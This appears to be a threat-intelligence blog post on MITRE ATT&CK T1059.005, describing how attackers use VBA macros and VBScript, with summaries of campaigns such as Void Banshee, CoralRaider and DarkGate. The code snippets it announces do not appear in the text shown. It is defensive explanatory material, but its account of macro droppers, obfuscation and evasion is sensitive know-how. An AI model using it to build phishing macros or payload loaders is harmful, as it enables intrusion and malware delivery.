T1059.005 Visual Basic is a sub-technique of Command and Scripting Interpreter (T1059) in the MITRE ATT&CK framework, under the Execution tactic. It refers to the use of Visual Basic–based languages by adversaries to execute code and automate actions on targeted systems.
Visual Basic (VB) is a programming language developed by Microsoft and derived from BASIC, designed to simplify application development and automation. Its ability to interact with system components through Component Object Model (COM) objects and native Windows APIs makes it suitable for executing code and manipulating system behavior.
This sub-technique also encompasses related scripting languages derived from Visual Basic, most notably Visual Basic for Applications (VBA) and VBScript. VBA is embedded within Microsoft Office applications such as Word, Excel, and PowerPoint and supports automation, access to Windows API functions, and interaction with dynamic link libraries (DLLs). VBScript, originally designed for web scripting, enables system and application interaction through COM and has historically been used in Internet Explorer and Internet Information Services (IIS).
To read about other sub-techniques of the T1059 Command and Scripting Interpreter technique, you can visit the related hub blog.
Adversaries use T1059.005 Visual Basic to execute malicious code and automate actions by abusing widely deployed and trusted scripting environments. Because VBA and VBScript are closely integrated with common enterprise software and operating system components, their execution can blend into normal user or administrative activity.
In malicious campaigns, adversaries frequently leverage VBA macros embedded in Microsoft Office documents to gain initial execution, often delivered via phishing attachments. VBScript is commonly used to launch payloads, interact with the file system, execute commands through COM objects, or chain execution with other scripting interpreters. By abusing these Visual Basic–based languages, attackers can support execution, persistence, and follow-on activity while minimizing the need for external tools.
As a competent and versatile tool, Visual Basic is leveraged by adversaries to its fullest extent for malicious activities.
Visual Basic can be abused to download, load, and execute malicious payloads by embedding harmful code in VBScript or VBA macros.
For example, in June 2025 researchers described a campaign in which a malicious PPTX delivered a ZIP containing both a VBScript and an executable [1]: the VBScript fetched an executable from the web, the executable then loaded the final payloads (notably RAT families such as XRed and LodaRAT), and persistence was achieved via registry Run keys and a Startup-folder shortcut.
Below is a redacted VBScript snippet the attackers used to download the malware payload (intentionally non-executable and redacted for safe analysis).
|
Purchase Order Summary Details.vbs |
Void Banshee Campaign
In July 2024, security researchers reported on the Void Banshee campaign, which targeted Windows users through a vulnerability identified as CVE-2024-38112 [2]. The attack chain involved the use of a malicious HTML Application (HTA) file* containing a VBScript. This script decrypted XOR-encrypted content and executed it using PowerShell, facilitating the download and execution of additional malicious scripts from compromised web servers.
|
*SHA-256: 87480b151e465b73151220533c965f3a77046138f079ca3ceb961a7d5fee9a33 |
CoralRaider Campaign
In April 2024, another researcher uncovered the CoralRaider campaign, which targeted victims' data and social media accounts [3]. The attackers employed a malicious VBScript embedded within an HTA file. This VBScript executed an embedded PowerShell script in memory, which sequentially ran additional scripts to perform anti-virtual machine and anti-analysis checks, bypass User Access Controls, disable Windows and application notifications, and ultimately download and execute the RotBot malware.
Water Hydra Campaign
The final example is from February 2024, researchers analyzed the Water Hydra campaign, which exploited a vulnerability (CVE-2024-21412) to bypass Microsoft Defender SmartScreen [4]. The final payload of this attack was a RAT known as DarkMe, written in Visual Basic. This malware communicated with its command-and-control server using a custom protocol over TCP, demonstrating the sophisticated use of Visual Basic in executing malicious operations.
These instances underscore the persistent threat posed by adversaries leveraging Visual Basic and its scripting variants to execute malicious code and maintain unauthorized access to targeted systems.
Sending a phishing email with an attachment containing malicious macro is a prevalent initial access technique among adversaries.
For instance, between July and September 2023, the DarkGate malware [5] is propagated via phishing campaigns exploiting compromised Skype accounts. Attackers send messages with attachments containing malicious VBA scripts.
These scripts are disguised to appear legitimate within the context of the existing conversation, enticing victims to open them. Once executed, the VBA scripts trigger the download of further malicious components, leading to installing of the DarkGate payload on the victim's system. This method of using script attachments in phishing efforts highlights a sophisticated approach to bypass users' vigilance and deliver malware.
In the case of IceBreaker malware, as documented in a February 2023 security report [6], the threat targets online gaming and gambling companies through an intricate blend of phishing and social engineering tactics. The cyber attackers impersonate customers experiencing account access difficulties and coax customer service representatives into downloading a file, ostensibly an image detailing the user's issue. This file, deceptively presented and often housed on a fraudulent website, is actually a container for a ZIP archive that deploys a malevolent VBA script or a manipulated LNK file. When activated, the VBA script is engineered to establish a network connection to a remote server from which it retrieves and launches the IceBreaker backdoor or Houdini RAT, both remote access trojans.
Adversaries often use VB code because it can hide malicious scripts within seemingly harmless or irrelevant code, enabling them to bypass initial security scans. In a notable example from March 2023, disclosed in the TACTICAL#OCTOPUS operation, adversaries employed VB code to obfuscate malicious PowerShell scripts [7]. The obfuscated script and its obfuscation function are provided below.
[1] “[No title].” Available: https://threatresearch.ext.hp.com/wp-content/uploads/2025/06/HP_Wolf_Security_Threat_Insights_Report_June_2025.pdf. [Accessed: Nov. 06, 2025]
[2] “CVE-2024-38112: Void Banshee Targets Windows Users Through Zombie Internet Explorer in Zero-Day Attacks,” Trend Micro, Jul. 15, 2024. Available: https://www.trendmicro.com/en_us/research/24/g/CVE-2024-38112-void-banshee.html. [Accessed: Nov. 27, 2024]
[3] C. Raghuprasad, “CoralRaider targets victims’ data and social media accounts,” Cisco Talos Blog, Apr. 04, 2024. Available: https://blog.talosintelligence.com/coralraider-targets-socialmedia-accounts/. [Accessed: Nov. 27, 2024]
[4] “CVE-2024-21412: Water Hydra Targets Traders with Microsoft Defender SmartScreen Zero-Day,” Trend Micro, Feb. 13, 2024. Available: https://www.trendmicro.com/en_us/research/24/b/cve202421412-water-hydra-targets-traders-with-windows-defender-s.html. [Accessed: Nov. 27, 2024]
[5] S. Gatlan, “DarkGate malware spreads through compromised Skype accounts,” BleepingComputer, Oct. 14, 2023. Available: https://www.bleepingcomputer.com/news/security/darkgate-malware-spreads-through-compromised-skype-accounts/. [Accessed: Dec. 20, 2023]
[6] Security Joes, “Operation Ice Breaker Targets The Gam(bl)ing Industry Right Before It’s Biggest Gathering,” Security Joes, Feb. 01, 2023. Available: https://www.securityjoes.com/post/operation-ice-breaker-targets-the-gam-bl-ing-industry-right-before-it-s-biggest-gathering. [Accessed: Dec. 20, 2023]
[7] “New TACTICAL#OCTOPUS Attack Campaign Targets US Entities with Malware Bundled in Tax-Themed Documents,” Securonix, Mar. 30, 2023. Available: https://www.securonix.com/blog/new-tacticaloctopus-attack-campaign-targets-us-entities-with-malware-bundled-in-tax-themed-documents/. [Accessed: Jan. 12, 2024]